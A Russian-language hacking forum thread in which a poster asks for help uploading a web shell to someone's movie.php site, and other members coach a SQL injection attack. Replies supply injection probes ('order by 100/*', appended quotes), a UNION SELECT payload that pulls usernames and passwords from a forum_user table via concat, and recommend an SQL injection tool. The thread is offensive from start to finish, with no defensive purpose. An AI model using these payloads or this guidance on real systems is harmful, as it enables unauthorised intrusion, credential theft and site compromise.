Пишу:

http://site/movie.php?page=shop

Выдаёт:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /varl/www/movie.php on line 198

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /varl/www/movie.php on line 199

Задача: Залить шелл.

что можно сделать!?
Вроде столбцы подбирать,но у меня ошибка не меняеться. Бред ! :eek:

Поможете? :)

Помощи негде просить,ну есть где но только там не хочу,у вас лучше,поэтому прошу помоч :rolleyes:

ну пишет же : предоставленый аргумент не является валидным результатом MySQL
то бишь ссылка не разультат передаемая функции mysql_num_rows - плохая. скорее всего там просто была ошибка в скул запросе и на ошибки перед продолжением не было проверено. отсюда такие фантики.

Попробуй заюзать Antichat SQL toolz

попробуй так =null+order+by+100/*

попробуй так =null+order+by+100/*

Пишу http://site/movie.php?=null+order+by+100/* ошибки нету вообще,что это значит? Столбцов меньше?

Попробуй заюзать Antichat SQL toolz

Вечерком скачаю,заюзаю :)
По описанию вкатила прога!

ну пишет же : предоставленый аргумент не является валидным результатом MySQL
то бишь ссылка не разультат передаемая функции mysql_num_rows - плохая. скорее всего там просто была ошибка в скул запросе и на ошибки перед продолжением не было проверено. отсюда такие фантики.

Да да да я эти фантики слышал,вы им всегда новичкам даёте? =)
MySQL у них косячный или мозг,поэтому ошибочка навернО...

Ошибка простая, инъекция возможна, но где-то 50/50

а вообще тема есть отдельная: https://forum.antichat.ru/thread36161.html

Пишу http://site/movie.php?=null+order+by+100/* ошибки нету вообще,что это значит? Столбцов меньше?
Врядли там инъекция или же там больше 100 столбцов, попробуй 99999, если не выдаст ошибку, забудь

нде... хенкеры, тебе как я пнонимаю после http://site/movie.php?page=shop надо для правильности кавычку ставить... а дальше уже пробовать скуль запрос, т.е. union select, дополнять order by, или пользовать подзапросы, желательно для этого всего, чтоб magic quotes была выключена, хотя хз скрипты разные бывают...

http://site/movie.php?=null+order+by+99999/* - нихрена
http://site/movie.php?=null+order+by+100/* - НИХРЕНА =(((

Только при http://site/movie.php?page=shop - ошибка ну которую я выше описывал.
Пишу http://site/movie.php?id=6547215' - ТОЖЕ ошибка таже самая...

Кстати кора,я для прикола написал

http://site/movie.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 %20,16,17,18,19,20,concat(username,0x3a,password)+ fro%20m+forum_user/* - таже ошибка...

http://site/movie.php?page=shop'+union+select+1,2,3,4,5,6,7,8, 9,etc.....
Кавычку попробуй просто поставь. Или дай линк в студию.